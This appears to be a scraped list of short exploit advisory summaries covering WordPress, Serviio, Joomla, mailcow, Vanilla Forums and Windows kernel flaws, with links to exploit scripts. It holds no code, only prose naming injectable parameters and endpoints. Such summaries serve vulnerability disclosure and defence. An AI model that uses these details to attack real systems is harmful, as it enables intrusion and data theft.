This module exploits a command injection vulnerability in WordPress version 4.6 with Exim as an MTA via a spoofed Host header to PHPMailer, a mail-sending library that is bundled with WordPress. A valid WordPress username is required to exploit the vulnerability. Additionally, due to the altered Host header, exploitation is limited to the default virtual host, assuming the header isn't mangled in transit. If the target is running Apache 2.2.32 or 2.4.24 and later, the server may have HttpProtocolOptions set to Strict, preventing a Host header containing parens from passing through, making exploitation unlikely.
This module exploits an unauthenticated remote command execution vulnerability in the console component of Serviio Media Server versions 1.4 to 1.8 on Windows operating systems. The console service exposes a REST API which does not require authentication. The 'action' API endpoint does not sufficiently sanitize user-supplied data in the 'VIDEO' parameter of the 'checkStreamUrl' method. This parameter is used in a call to cmd.exe resulting in execution of arbitrary commands. This module has been tested successfully on Serviio Media Server versions 1.4.0, 1.5.0, 1.6.0 and 1.8.0 on Windows 7.
When accessing an OOP COM object using IRemUnknown2, the local unmarshaled proxy can be for a different interface to that requested by QueryInterface resulting in a type confusion which can result in EoP.
This exploit demonstrates a buffer overflow vulnerability in the LabF nfsAxe 3.7 FTP Client. The exploit takes advantage of a stack-based buffer overflow in the application's handling of user-supplied input. By sending a specially crafted FTP command, an attacker can overwrite the structured exception handler (SEH) and gain control of the program's execution flow. This vulnerability can be exploited to execute arbitrary code on the target system.
This vulnerability allows an attacker to perform blind SQL injection in the Joomla Component Pony Gallery version 1.5 and below. By manipulating the 'catid' parameter in the 'viewcategory' function, an attacker can inject SQL code and potentially retrieve sensitive information from the database.
It is possible to disclose portions of uninitialized kernel stack memory to user-mode applications in Windows 7 indirectly through the win32k!NtUserCreateWindowEx system call.
The handler of the nt!NtTraceControl system call discloses portions of uninitialized pool memory to user-mode clients on Windows 10 systems. The uninitialized values are copied back to user-mode, which can potentially expose sensitive information.
CSRF vulnerabilities in mailcow 0.14 allow authenticated mailcow users to perform malicious actions such as resetting admin password, adding arbitrary admin, and deleting domains.
This exploit takes advantage of a format bug in the SMTP protocol to execute a malicious command on a vulnerable system. The command to execute cannot exceed 90 characters.
This exploit allows remote code execution in Vanilla Forums version 2.3. It takes advantage of two vulnerabilities: CVE-2016-10033 (RCE) and CVE-2016-10073 (Header Injection). The exploit code can be found at https://exploitbox.io/exploit/vanilla-forums-rce-exploit.sh. More information can be found in the full advisory at https://exploitbox.io/vuln/Vanilla-Forums-Exploit-RCE-0day-Remote-Code-Exec-CVE-2016-10033.html. Other related advisories include: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html and https://exploitbox.io/vuln/Vanilla-Forums-Exploit-Host-Header-Injection-CVE-2016-10073-0day.html. For more details on the vulnerability and exploitation, refer to the white-paper 'Pwning PHP mail() function For Fun And RCE' at https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html.
Services By CQR